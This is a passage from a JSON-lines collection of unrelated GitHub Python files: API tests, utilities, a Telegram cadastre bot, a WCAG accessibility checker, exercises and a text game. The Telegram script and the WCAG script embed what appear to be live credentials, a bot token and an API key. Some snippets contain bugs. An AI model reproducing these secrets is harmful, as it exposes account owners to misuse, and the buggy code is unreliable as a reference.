\"attributes\": {\n \"body\": \"example\",\n },\n \"relationships\": {\n \"entry\": {\"data\": {\"type\": \"resource_name_from_JSONAPIMeta\", \"id\": 1}}\n },\n }\n }\n\n def test_model_resource_name_on_list(self, client):\n models.Comment.__bases__ += (_PatchedModel,)\n response = client.get(reverse(\"comment-list\"))\n data = response.json()[\"data\"][0]\n # name should be super-author instead of model name RenamedAuthor\n assert (\n data.get(\"type\") == \"resource_name_from_JSONAPIMeta\"\n ), \"resource_name from model incorrect on list\"\n\n # Precedence tests\n def test_resource_name_precendence(self, client, monkeypatch):\n # default\n response = client.get(reverse(\"comment-list\"))\n data = response.json()[\"data\"][0]\n assert (\n data.get(\"type\") == \"comments\"\n ), \"resource_name from model incorrect on list\"\n\n # model > default\n models.Comment.__bases__ += (_PatchedModel,)\n response = client.get(reverse(\"comment-list\"))\n data = response.json()[\"data\"][0]\n assert (\n data.get(\"type\") == \"resource_name_from_JSONAPIMeta\"\n ), \"resource_name from model incorrect on list\"\n\n # serializer > model\n monkeypatch.setattr(\n serializers.CommentSerializer.Meta,\n \"resource_name\",\n \"resource_name_from_serializer\",\n False,\n )\n response = client.get(reverse(\"comment-list\"))\n data = response.json()[\"data\"][0]\n assert (\n data.get(\"type\") == \"resource_name_from_serializer\"\n ), \"resource_name from serializer incorrect on list\"\n\n # view > serializer > model\n monkeypatch.setattr(\n views.CommentViewSet, \"resource_name\", \"resource_name_from_view\", False\n )\n response = client.get(reverse(\"comment-list\"))\n data = response.json()[\"data\"][0]\n assert (\n data.get(\"type\") == \"resource_name_from_view\"\n ), \"resource_name from view incorrect on list\"\n\n def test_model_resource_name_create(self, client):\n models.Comment.__bases__ += (_PatchedModel,)\n models.Entry.__bases__ += (_PatchedModel,)\n response = client.post(reverse(\"comment-list\"), self.create_data)\n\n assert response.status_code == status.HTTP_201_CREATED\n\n def test_serializer_resource_name_create(self, client, monkeypatch):\n monkeypatch.setattr(\n serializers.CommentSerializer.Meta,\n \"resource_name\",\n \"renamed_comments\",\n False,\n )\n monkeypatch.setattr(\n serializers.EntrySerializer.Meta, \"resource_name\", \"renamed_entries\", False\n )\n create_data = deepcopy(self.create_data)\n create_data[\"data\"][\"type\"] = \"renamed_comments\"\n create_data[\"data\"][\"relationships\"][\"entry\"][\"data\"][\n \"type\"\n ] = \"renamed_entries\"\n\n response = client.post(reverse(\"comment-list\"), create_data)\n\n assert response.status_code == status.HTTP_201_CREATED\n\n def teardown_method(self, method):\n models.Comment.__bases__ = (models.Comment.__bases__[0],)\n models.Entry.__bases__ = (models.Entry.__bases__[0],)\n\n\n@pytest.mark.usefixtures(\"single_entry\")\nclass TestResourceNameConsistency:\n # Included rename tests\n def test_type_match_on_included_and_inline_base(self, client):\n _check_relationship_and_included_comment_type_are_the_same(\n client, reverse(\"entry-list\")\n )\n\n def test_type_match_on_included_and_inline_with_JSONAPIMeta(self, client):\n models.Comment.__bases__ += (_PatchedModel,)\n\n _check_relationship_and_included_comment_type_are_the_same(\n client, reverse(\"entry-list\")\n )\n\n def test_type_match_on_included_and_inline_with_serializer_resource_name(\n self, client\n ):\n serializers.CommentSerializer.Meta.resource_name = (\n \"resource_name_from_serializer\"\n )\n\n _check_relationship_and_included_comment_type_are_the_same(\n client, reverse(\"entry-list\")\n )\n\n def test_type_match_on_included_and_inline_without_serializer_resource_name(\n self, client\n ):\n serializers.CommentSerializer.Meta.resource_name = None\n\n _check_relationship_and_included_comment_type_are_the_same(\n client, reverse(\"entry-list\")\n )\n\n def test_type_match_on_included_and_inline_with_serializer_resource_name_and_JSONAPIMeta(\n self, client\n ):\n models.Comment.__bases__ += (_PatchedModel,)\n serializers.CommentSerializer.Meta.resource_name = (\n \"resource_name_from_serializer\"\n )\n\n _check_relationship_and_included_comment_type_are_the_same(\n client, reverse(\"entry-list\")\n )\n\n # Relation rename tests\n def test_resource_and_relationship_type_match(self, client):\n _check_resource_and_relationship_comment_type_match(client)\n\n def test_resource_and_relationship_type_match_with_serializer_resource_name(\n self, client\n ):\n serializers.CommentSerializer.Meta.resource_name = (\n \"resource_name_from_serializer\"\n )\n\n _check_resource_and_relationship_comment_type_match(client)\n\n def test_resource_and_relationship_type_match_with_JSONAPIMeta(self, client):\n models.Comment.__bases__ += (_PatchedModel,)\n\n _check_resource_and_relationship_comment_type_match(client)\n\n def test_resource_and_relationship_type_match_with_serializer_resource_name_and_JSONAPIMeta(\n self, client\n ):\n models.Comment.__bases__ += (_PatchedModel,)\n serializers.CommentSerializer.Meta.resource_name = (\n \"resource_name_from_serializer\"\n )\n\n _check_resource_and_relationship_comment_type_match(client)\n\n def teardown_method(self, method):\n models.Comment.__bases__ = (models.Comment.__bases__[0],)\n try:\n delattr(serializers.CommentSerializer.Meta, \"resource_name\")\n except AttributeError:\n pass\n","repo_name":"django-json-api/django-rest-framework-json-api","sub_path":"example/tests/integration/test_model_resource_name.py","file_name":"test_model_resource_name.py","file_ext":"py","file_size_in_byte":7836,"program_lang":"python","lang":"en","doc_type":"code","stars":1116,"dataset":"github-code","pt":"37"} +{"seq_id":"10427516889","text":"#!usr/bin/env python \r\n# -*- coding: utf-8 -*-\r\n#python ver 2.7.12\r\n# SQLite3\r\n\r\n# Python DRILL #60\r\n\r\n# ---------- database utils\r\n\r\nimport sqlite3\r\nimport time\r\nimport datetime\r\nimport random\r\n\r\ndef create_table():\r\n conn = sqlite3.connect('FileCheck.db')\r\n c = conn.cursor()\r\n c.execute(\"CREATE TABLE IF NOT EXISTS Checktable(id INTEGER PRIMARY KEY AUTOINCREMENT, unix REAL, timestamp TEXT, keyword TEXT, value REAL)\")\r\n #print \"create_table() finished\"\r\n conn.commit()\r\n c.close()\r\n conn.close()\r\ncreate_table()\r\n\r\ndef timestamp(timestamp):\r\n #print(\"\\ntimestamp() called.\\n\")\r\n conn = sqlite3.connect('FileCheck.db')\r\n c = conn.cursor()\r\n unix = int(time.time())\r\n #print timestamp\r\n c.execute(\"INSERT INTO Checktable (unix, timestamp) VALUES (?, ?)\",\r\n (unix, timestamp))\r\n conn.commit()\r\n c.close()\r\n conn.close()\r\n #print(\"\\ntimestamped: \" + timestamp +\"\\n\")\r\n\r\ndef getlaststamp():\r\n #print(\"\\ngetlaststamp() called.\\n\")\r\n conn = sqlite3.connect('FileCheck.db')\r\n c = conn.cursor()\r\n c.execute(\"SELECT timestamp FROM Checktable ORDER BY unix desc limit 1\")\r\n try:\r\n data = c.fetchone()[0]\r\n except:\r\n data = \"No transfer to date.\"\r\n c.close()\r\n conn.close()\r\n return data\r\n\r\ndef clear_table():\r\n c.execute('DELETE FROM Checktable')\r\n conn.commit()\r\n\r\n'''\r\ndef read_db():\r\n c.execute('SELECT * FROM Checktable')\r\n data = c.fetchall()\r\n for row in data:\r\n print(row)\r\n#read_db()\r\n'''\r\n","repo_name":"michaeltharper/eduware","sub_path":"The-Tech-Academy-coursework/Python/FileCheck-GUI-DB/dbutils.py","file_name":"dbutils.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41446834865","text":"\"\"\" Rebin 1D spectrum to new pixel scale.\"\"\"\n\nimport math\nimport numpy as np\ndef rb_specbin(flux,nbin,**kwargs):\n \"\"\"This function bins up 1D spectra in integer pixels. The routine returns a\n structure of flux and wavelength and variance that has been rebinned.\n \n Parameters\n -----------\n \n fx - Flux\n nbin - Number of pixels to bin on\n VAR= -- Input variance array [Optional]\n WAV= -- Input wavelength array [Optional]\n \n Returns\n --------\n bin - Structure of data\n \n Example\n --------\n bin = rb_specbin(fx, 3)\n \n \n REVISION HISTORY:\n Written by RB. June 2015\n -\n ------------------------------------------------------------------------------\n \"\"\"\n TF=0\n TFF=0\n if 'var' in kwargs:\n var = kwargs['var']\n TF = 1\n if 'wave' in kwargs:\n wave = kwargs['wave']\n TFF = 1\n \n\n wavePixels = len(flux)\n if (wavePixels % nbin) != 0:\n numPix = math.floor(wavePixels/nbin) + 1\n else:\n numPix = math.floor(wavePixels/nbin)\n first = wavePixels % nbin\n if first == 0:\n first = nbin\n newFlux = np.zeros(numPix,)\n newVar = np.zeros(numPix,)\n newWave = np.zeros(numPix,) \n # Binning\n for qq in range(numPix-1): \n ii = qq*nbin\n index = np.array(range(ii,ii+nbin))\n if qq != numPix: \n #add them up\n newFlux[qq] = np.mean(flux[index])\n if TF == 1:\n newVar[qq] = np.mean(var[index])\n if TFF == 1:\n newWave[qq] = np.mean(wave[index])\n else: #last pixel\n index = np.array(range(ii,ii+first))\n newFlux[qq] = np.mean(flux[index])\n if TF == 1:\n newVar[qq] = np.mean(var[index])\n if TFF == 1:\n newWave[qq] = np.mean(wave[index])\n output={}\n output['flux']=newFlux\n\n #returns = newFlux\n if TF == 1:\n #newVar is in second column of returns\n #returns = np.append(returns,newVar,axis = 1)\n output['error']=np.sqrt(newVar/nbin)\n if TFF == 1:\n #returns = np.append(returns,newWave,axis = 1)\n output['wave']=newWave\n\n\n\n return output\n\n","repo_name":"rongmon/rbcodes","sub_path":"IGM/rb_specbin.py","file_name":"rb_specbin.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"28205393417","text":"\n\nimport time\nfrom login import login\nfrom utils import driver\nfrom selenium.webdriver.common.by import By\n\nstart_time = time.time()\n\ndef CT_029():\n try:\n login()\n time.sleep(1)\n\n #Seleciona o menu\n menu = driver.find_element_by_xpath('//*[@id=\"action-menu-toggle-1\"]').click()\n time.sleep(1)\n\n #Clica em preferências\n preferencias = driver.find_element_by_xpath('//*[@id=\"action-menu-1-menu\"]/a[6]').click()\n time.sleep(2)\n \n #Clica em preferências de mensagens\n preferencias_msg = driver.find_element_by_xpath('//*[@id=\"region-main\"]/div/div/div/div/div/div[1]/div/div/div/div[8]/a').click()\n time.sleep(2)\n \n #Selecionar apenas meus contatos\n mensagens = driver.find_element_by_xpath(' //*[@id=\"yui_3_17_2_1_1662058687387_31\"]').click()\n\n \n\n print('CT_029: ✅ - Ajustar preferências de mensagens.')\n\n except:\n print('CT_029: ❌ - Ajustar preferências de mensagens.')\n\nexecution = (time.time() - start_time) * 1000\n\nif(__name__ == '__main__'):\n CT_029()\n print('CT_029: ✅')\n driver.close()\n print(\"Done in\", round(execution, 4), \"ms.\")\n\n","repo_name":"Carlosvpm/teste-qualidade-software","sub_path":"tests/CT_029.py","file_name":"CT_029.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23014640298","text":"class Node:\n def __init__(self, data = None):\n self.data = data\n self.next = None\n\nclass LinkedList:\n def __init__(self):\n self.start_node = Node()\n\n def add_to_start(self, data):\n node = Node(data)\n node.next = self.start_node.next\n self.start_node.next = node\n\n def add_to_end(self, data):\n n = self.start_node\n while n.next is not None:\n n = n.next\n \n node = Node(data)\n n.next = node\n\n def remove_from_start(self):\n n = self.start_node.next\n if n is None:\n print('List is empty')\n else:\n self.start_node.next = n.next\n n.next = None\n n = None\n\n def remove_from_last(self):\n n = self.start_node\n if n.next is None:\n print('List is empty')\n else:\n while n.next.next is not None:\n n = n.next\n \n n.next = None\n\n def travese_from_start(self):\n node = self.start_node\n while node is not None:\n if node.data is not None:\n print(node.data)\n node = node.next\n\nif __name__ == '__main__':\n linkedList = LinkedList()\n number_start = int(input('Enter number of items to be added at start :: '))\n number_end = int(input('Enter number of items to be added at last :: '))\n\n for i in range(number_start):\n data = int(input('Enter item to be added at start :: '))\n linkedList.add_to_start(data)\n\n print('Items in the list now...')\n linkedList.travese_from_start()\n print('------------------------')\n\n for i in range(number_end):\n data = int(input('Enter item to be added at end :: '))\n linkedList.add_to_end(data)\n\n print('Items in the list now...')\n linkedList.travese_from_start()\n print('------------------------')\n","repo_name":"luthraG/ds-algo-war","sub_path":"general-practice/09_09_2019/LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30515654096","text":"import telepot\nimport time\nimport requests\n\n#manejador de mensajes\ndef handle(msg):\n chat_id=msg['chat']['id']\n latitud=msg['location']['latitude']\n longitud=msg['location']['longitude']\n #print('el comando es: '+comando)\n consulta=\"http://ovc.catastro.meh.es/ovcservweb/ovcswlocalizacionrc/ovccoordenadas.asmx/Consulta_RCCOOR?SRS=EPSG:4326&Coordenada_X=\"+str(longitud)+\"&Coordenada_Y=\"+str(latitud)\n respuesta = requests.get(consulta)\n texto=str(respuesta.content)\n print(texto)\n parte1=texto[texto.find(\"\")+5:texto.find(\"\")]\n parte2 = texto[texto.find(\"\") + 5:texto.find(\"\")]\n direccion=texto[texto.find(\"\") + 5:texto.find(\"\")]\n bot.sendMessage(chat_id, str(latitud) + \" , \" + str(longitud))\n if(texto.find(\"\")<0):\n bot.sendMessage(chat_id, \"No hay referencia catastral para ese punto.\")\n else:\n\n bot.sendMessage(chat_id,parte1+parte2)\n bot.sendMessage(chat_id, direccion)\nbot=telepot.Bot(\"1038379101:AAGE54hpNSe7VOthfAqR56btiddTY4FjLpk\")\nbot.message_loop(handle)\nwhile(True):\n time.sleep(10)","repo_name":"gore999/catastrobot","sub_path":"venv/catastrobot.py","file_name":"catastrobot.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18355519852","text":"# -*- coding: utf-8 -*-\n\nimport requests\nimport json\nimport pandas as pd\nimport numpy as np\n\n\n# Register at http://wave.webaim.org/api/\nwave_api_key = '7q58g54k597' \n\n# INPUT: Flat file with one URL per line, looks in current folder\ninput_filename = 'test short.txt'\n\n# OUTPUT: replaces existing file with that name, otherwise creates it\noutput_filename = 'test short.xlsx'\n\n# True: show on-screen process indicators; False: Don't show.\non_screen_process = True\n\n\ndef call_wave_api(page_URL):\n \n wave_api_URL = \"http://wave.webaim.org/api/request\"\n \n params = {\"key\": wave_api_key, \n \"url\": page_URL,\n \"format\": \"json\",\n \"reporttype\": 1\n }\n\n\n # ERROR HANDLING 1: REQUESTS\n try:\n # requests.get returns JSON string\n r = requests.get(wave_api_URL, params=params, timeout=21)\n except requests.exceptions.Timeout:\n return_string = 'Operation timed out without response.'\n return return_string\n except requests.exceptions.TooManyRedirects:\n return_string = 'Bad URL, too many redirects.'\n return return_string\n except requests.exceptions.RequestException as e:\n return e\n \n\n # ERROR HANDLING 2: API \n if r.status_code == requests.codes.ok:\n # API call returns wrong encoding, need to hard-code\n r.encoding = 'utf-8'\n # convert json string to json dictionary\n return r.json()\n else:\n return r.status_code, r.raise_for_status()\n \n \n \ndef convert_wcag_errors_to_score(wcag_errors):\n \n if wcag_errors < 10:\n return 3\n elif wcag_errors >= 10 and wcag_errors < 20:\n return 2\n elif wcag_errors >= 20 and wcag_errors < 30:\n return 1\n else:\n return 0\n \n \n\ndef main():\n\n # READ LIST OF USER-SUBMITTED URLs\n # encoding parameter important for cases where URLs have non-ASCII characters\n file_URLs = open(input_filename, mode='r', encoding='utf_8')\n \n # CREATE LIST STRUCTURE FOR STORING ALL URLS TO TEST\n list_URLs = []\n \n for line in file_URLs: \n list_URLs.append(line.strip()) # use .strip() to remove leading and trailing whitespace and end of line characters\n \n file_URLs.close()\n \n \n # TODO: LOCATE URL TO A RANDOM SUB-PAGE FOR EACH USER-SUBMITTED URL, ADD TO list_URLs\n #\n #\n\n \n # VARIABLE USED IN ON-SCREEN PROCESS INDICATOR\n total_URLs = len(list_URLs)\n \n \n # CREATE DATAFRAME TO STORE API TEST RESULTS\n df_result = pd.DataFrame(columns=['Web page title', 'Web page URL', 'Number of WCAG errors', 'Detailed WCAG report'])\n \n # CREATE DATAFRAME TO STORE API TEST PROBLEMS\n df_problems = pd.DataFrame(columns=['Web page URL', 'Problem details'])\n number_problems = 0\n \n # CALL API TO TEST EACH URL, ADD RESULT TO DATAFRAME\n for i, URL in enumerate(list_URLs):\n if on_screen_process: print('Testing URL ', i + 1, ' of ', total_URLs, '.')\n\n URL_result = call_wave_api(URL) \n \n try:\n # process relevant data fields: pagetitle, page url and number of WCAG errors\n # the following two lines obsolete since UTF-8 encoding enforced API call result\n #pagetitle_unicode = bytes(URL_result['statistics']['pagetitle'],'iso-8859-1').decode('utf-8')\n #df_result.loc[i] = [pagetitle_unicode, URL_result[\"statistics\"][\"pageurl\"], URL_result[\"statistics\"][\"waveurl\"], URL_result[\"categories\"][\"error\"][\"count\"]] \n df_result.loc[i] = [URL_result['statistics']['pagetitle'], URL_result[\"statistics\"][\"pageurl\"], URL_result[\"categories\"][\"error\"][\"count\"], URL_result[\"statistics\"][\"waveurl\"]] \n \n if on_screen_process: print('OK', ': ', URL)\n \n except:\n # handle errors in API call return\n None\n df_problems.loc[i] = [URL, URL_result] \n number_problems += 1\n \n if on_screen_process: print('ERROR', ': ', URL)\n if on_screen_process: print(URL_result)\n\n \n if on_screen_process: print('\\n')\n \n \n # CREATE EXCEL FILE OBJECT FOR EXPORT\n excel_writer = pd.ExcelWriter(output_filename, engine='xlsxwriter')\n \n \n # DATAFRAME 1: RESULTS\n \n # Reset dataframe index to create continuous row numbers starting with 1\n df_result = df_result.reset_index(drop=True)\n df_result.index += 1\n \n # ON-SCREEN PROCESS INDICATOR\n if on_screen_process: print('Writing results to Excel file.')\n \n # EXPORT RESULTS TO EXCEL\n df_result.to_excel(excel_writer, sheet_name='List of URLs')\n \n \n # DATAFRAME 2: SYNTHESIS\n \n # SYNTHESISE THE DATASET\n avg_wcag_errors = np.mean(df_result['Number of WCAG errors'])\n mean_wcag_errors = np.median(df_result['Number of WCAG errors'])\n number_URLs_ok = len(df_result)\n score = convert_wcag_errors_to_score(avg_wcag_errors)\n\n synthesis = {'Average number of WCAG errors' : avg_wcag_errors,\n 'Median number of WCAG errors' : mean_wcag_errors,\n 'URLs successfully tested' : number_URLs_ok,\n 'Indicator score (points)' : score,\n 'URL problems (see separate sheet)': number_problems\n }\n \n # CONVERT SYNTHESIS DICT TO DATAFRAME\n # First one no longer works in py3.5 \n #df_synthesis = pd.DataFrame(synthesis.items(), columns=['Title', 'Value'])\n df_synthesis = pd.DataFrame.from_dict(synthesis, orient='index')\n \n # EXPORT SYNTHESIS TO EXCEL (SAME FILE, DIFFERENT SHEET)\n df_synthesis.to_excel(excel_writer, sheet_name='Synthesis') \n \n \n # DATAFRAME 3: URL PROBLEMS\n \n # Reset dataframe index to create continuous row numbers starting with 1\n df_problems = df_problems.reset_index(drop=True)\n df_problems.index += 1\n \n # EXPORT LIST OF PROBLEMATIC URLS TO EXCEL (SAME FILE, DIFFERENT SHEET)\n df_problems.to_excel(excel_writer, sheet_name='URL problems')\n \n \n # FINALISE EXCEL EXPORT\n excel_writer.save()\n \n if on_screen_process: print('Done.')\n\nif __name__ == '__main__':\n main()","repo_name":"arturelis/WCAG-batch-test","sub_path":"WCAG batch testing w API.py","file_name":"WCAG batch testing w API.py","file_ext":"py","file_size_in_byte":6235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14256021818","text":"def solution(A, K, L):\n if K+L > len(A):\n return -1\n if K >= L :\n big = K\n small = L\n if K < L :\n big = L\n small = K \n sum_A = []\n sum_B = []\n for n in range(len(A)-bi+1):\n sum_A.append([n,sum(A[n:n+big])])\n for n in range(len(A)-small+1):\n sum_B.append([n,sum(A[n:n+small])])\n result = 0\n local_sum = 0\n for i in sum_A:\n for j in sum_B:\n if j[0] - i[0] >= 0 and j[0] - i[0] < big or i[0] - j[0] >=0 and i[0] - j[0] < small:\n continue\n local_sum = i[1] + j[1]\n if local_sum > result:\n result = local_sum\n return result \n\nif __name__ == \"__main__\":\n q = ([int(i) for i in input().split(',')], int(input()), int(input()))\n print(solution(*q))","repo_name":"TousakaNagio/EECP_onlinejudge","sub_path":"AppleOrchardCoding.py","file_name":"AppleOrchardCoding.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17676066143","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 8 21:13:02 2015\n\n@author: rafael\n\"\"\"\n\nfrom pylab import*\nt = 0.0\ndt =0.01\nx = 10.0 \nv = 0.0 \nk = 10.0 \nm = 2.0 \ntm=[]\nvel =[]\ndis = []\nwhile t < 5:\n f = -k*x \n v = v+(f/m)*dt\n x= x+v*dt\n t= t+dt\n tm.append(t)\n vel.append(v)\n dis.append(x)\n plot(tm,vel)\n plot(tm,dis)\n show()\n ","repo_name":"airbos994/RafaelLanasElChupacabra","sub_path":"wtf.py","file_name":"wtf.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36932261671","text":"from setuptools import setup, find_packages\n# To use a consistent encoding\nfrom codecs import open\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='cxc-gis',\n version='0.2.1',\n description='Geographic information system lib',\n long_description=long_description,\n url='https://github.com/XiaochenCui/cxc-gis',\n author='Xiaochen Cui',\n author_email='jcnlcxc.new@gmail.com',\n license='GPLv3',\n classifiers=[\n 'Development Status :: 1 - Planning',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3 :: Only',\n ],\n keywords='gis',\n packages=find_packages(),\n install_requires=['utm'],\n)\n","repo_name":"XiaochenCui/cxc-gis","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2627649469","text":"#!/usr/bin/python3\n\"\"\"\n Function sum integer\n Fun:\n add_integer\n\"\"\"\n\n\ndef add_integer(a, b=98):\n \"\"\"\n Function sum integer\n \"\"\"\n if type(a) != int and type(a) != float:\n raise TypeError(\"a must be an integer\")\n elif type(b) != int and type(b) != float:\n raise TypeError(\"b must be an integer\")\n else:\n return (int(a + b))\n","repo_name":"tomasmpcr/holbertonschool-higher_level_programming","sub_path":"0x07-python-test_driven_development/0-add_integer.py","file_name":"0-add_integer.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2589849498","text":"from BLL import BLL_Log\nfrom BLL import BLL_Dataframe_Personalizado\nfrom BLL import BLL_Grafico\nfrom BE import BE_Grafico\nimport gc\nimport os\nfrom PySide2.QtGui import QPixmap\n\nclass Grafico_Personalizado(BLL_Grafico.Grafico):\n\n def __init__(self):\n BE_Grafico.Grafico.setID(self, 1)\n BE_Grafico.Grafico.setNombre(self, \".//DATA//GRAFICOS//Grafico Personalizado.png\")\n\n\n def graficoPersonalizado(self, tipoGrafico, tipoDato, columna, cliente, fechaInicio, fechaFin, top = None):\n try:\n dataframe = BLL_Dataframe_Personalizado.Dataframe_Personalizado() \n filas = dataframe.leerEventosDB(fechaInicio, fechaFin, cliente, tipoDato)\n df = dataframe.crearDataframePersonalizado(filas)\n if tipoGrafico == \"Torta\":\n graf = self.graficarTorta(df, columna, 10)\n elif tipoGrafico == \"Barras\":\n graf = self.graficarBarras(df, columna, 10)\n elif tipoGrafico == \"Histograma\":\n graf = self.graficarHistograma(df)\n \n graf.savefig(os.getcwd() + \"//DATA//GRAFICOS//Grafico Personalizado.png\", bbox_inches='tight')\n \n except Exception as e:\n BLL_Log.Log().escribir(\"Error en Grafico Personalizado: \" + str(e), cliente.nombre, \"error\")\n\n return graf\n \n\n def graficoPersonalizadoDash(self, tipoGrafico, tipoDato, columna, cliente, fechaInicio, fechaFin, top = None):\n pixmap = \"\"\n try:\n dataframe = BLL_Dataframe_Personalizado.Dataframe_Personalizado() \n filas = dataframe.leerEventosDB(fechaInicio, fechaFin, cliente, tipoDato)\n df = dataframe.crearDataframePersonalizado(filas)\n if tipoGrafico == \"Torta\":\n graf = self.graficarTorta(df, columna, 10)\n elif tipoGrafico == \"Barras\":\n graf = self.graficarBarras(df, columna, 10)\n elif tipoGrafico == \"Histograma\":\n graf = self.graficarHistograma(df)\n \n rutaGraficoTemporal = os.getcwd() + \"//DATA//GRAFICOS//graficoTemporal.png\"\n graf.savefig(rutaGraficoTemporal, bbox_inches='tight')\n print(df)\n pixmap = QPixmap(rutaGraficoTemporal)\n os.remove(rutaGraficoTemporal)\n \n except Exception as e:\n BLL_Log.Log().escribir(\"Error en Grafico PersonalizadoDash: \" + str(e), \"general\", \"error\")\n\n return pixmap\n\n\n \n\n def __del__(self):\n gc.collect()","repo_name":"MusicLab/Automatization","sub_path":"BLL/BLL_Grafico_Personalizado.py","file_name":"BLL_Grafico_Personalizado.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30974471184","text":"'''\nGiven an array of integers nums and an integer k, return the total number of subarrays whose sum equals to k.\n\nExample 1:\n\nInput: nums = [1,1,1], k = 2\nOutput: 2\n\nExamnple 2:\nInput: nums = [0,0,0,0,0,0,0,0] k= 0\n\n'''\n'''\nTC:- O(n) where n is the length of the array\nSC:- O(n) for hash Map\n'''\nclass Solution:\n def subarraySum(self, nums: List[int], k: int) -> int:\n frequency = {}\n Answer = 0;\n Sum = 0;\n for i in range(len(nums)):\n Sum += nums[i];\n if Sum == k :\n Answer += 1;\n if Sum-k in frequency:\n Answer += frequency[Sum-k];\n frequency[Sum] = frequency.get(Sum,0) + 1\n \n return Answer\n \n","repo_name":"shreyatpandey/Coding-Challenges","sub_path":"Fb_ph/Practice/Python/Subarray Sum Equals K.py","file_name":"Subarray Sum Equals K.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13749777171","text":"from dataclasses import dataclass\nfrom random import choice\nimport random\nimport pickle\nimport os\nfrom typing import List, Tuple\n\n@dataclass\nclass Player:\n name: str\n max_health: int\n health: int\n max_mana: int\n mana: int\n p_class: str\n advanced_class: str\n level: int\n xp: int\n gold: int\n orb: int\n curr_weapon: str\n health_potion: int\n mana_potion: int\n skills: list\n inventory: list\n sideloc: str\n end: str\n\nskill_damage = {\n \"Vertical Arc\": 8,\n \"Fireball\": 8,\n \"Long Shot\": 8,\n \"Howling Octave\": 15,\n \"Lunar Tempest\": 15,\n \"Sneak Attack\": 15,\n \"Deadly Sins\": 22,\n \"Soul Rain\": 22,\n \"Sinister Strike\": 22,\n}\nskill_cost = {\n \"Vertical Arc\": 5,\n \"Fireball\": 5,\n \"Long Shot\": 5,\n \"Howling Octave\": 10,\n \"Lunar Tempest\": 10,\n \"Sneak Attack\": 10,\n \"Deadly Sins\": 15,\n \"Soul Rain\": 15,\n \"Sinister Strike\": 15,\n}\nweapons = {\"Rusted Sword\": 5, \"Short Sword\": 14, \"Claymore\": 20, \"God Sword\": 60}\n\ninventory = [\"Rusted Sword\", \"God Sword\"]\n\ntowns = {\n \"Waverly\": \"Situated on the base of a geyser field, the hamlet of Waverly is home to vikings lead by Lord Lockridge. \\nThis hamlet wasn't built by a geyser field by accident, as it has an abundance of minerals, which is of great importance to the people of Waverly and its success. \\nThe hamlet itself looks unattractive. With its rusted rooftops, rusted walls and whistling wind, Waverly has a gloomy atmosphere. \\nWaverly has a mending economy, which is mainly supported by woodcrafting, jewelcrafting and baking. But their biggest strengths are alchemy and advanced medicine. \\nHowever, Waverly lacks people skilled in animal breeding.\\n[Road1(to Kingston or Oakland), Forrest1, Jagged Tombs]\",\n \"Oakland\": \"Forged next to a cave, the village of Oakland is home to elves lead by Supervisor Ninleyn. \\nThis village wasn't built by a cave by accident, as it has fertile soils, which is of great importance to the people of Oakland and its success. \\nThe village itself looks sublime. With its elm wood rooftops, ironwood walls and lucious gardens, Oakland has a charming atmosphere. \\nOakland has a wounded economy, which is mainly supported by fletching, trade and baking. But their biggest strengths are deadly archers and delicate woodcrafting. \\nHowever, Oakland lacks people skilled in alchemy.\\n[Road1(to Riverside or Waverly), Forrest1, Lifeless Labyrinth]\",\n \"Kingston\": \"Formed inside a field, the burg of Kingston is home to orcs lead by Marshal Grikug. \\nThis burg wasn't built by a field by accident, as it has rare plants, which is of great importance to the people of Kingston and its success. \\nThe burg itself looks delightful. With its silky oak wood rooftops, lavastone walls and frozen lakes, Kingston has a pleasing atmosphere. \\nKingston has a declining economy, which is mainly supported by baking, alchemy and thieving. But their biggest strengths are sophisticated cooking and skilled fighters. \\nHowever, Kingston lacks people skilled in animal training.\\n[Road1(to Waverly or Riverside), Forrest1, Shadowed Dungeon]\",\n \"Riverside\": \"Based on the Northern side of a waterfall, the port of Riverside is home to high elves lead by Director Alwin. \\nThis port wasn't built by a waterfall by accident, as it has unique wildlife, which is of great importance to the people of Riverside and its success. \\nThe port itself looks impressive. With its cypress wood rooftops, mahogany wood walls and silent mountain range, Riverside has a intriguing atmosphere. \\nRiverside has a hurting economy, which is mainly supported by hunting, thieving and beer brewing. But their biggest strengths are skilled fighters and intricate fletching techniques. \\nHowever, Riverside lacks people skilled in tailoring.\\n[Road1(to Oakland or Kingston), Forrest1, Dreadful Tunnels]\",\n \"Jagged Tombs\": \"A short worn statue in a murky woodlands marks the entrance to this dungeon.\\n[Waverly]\",\n 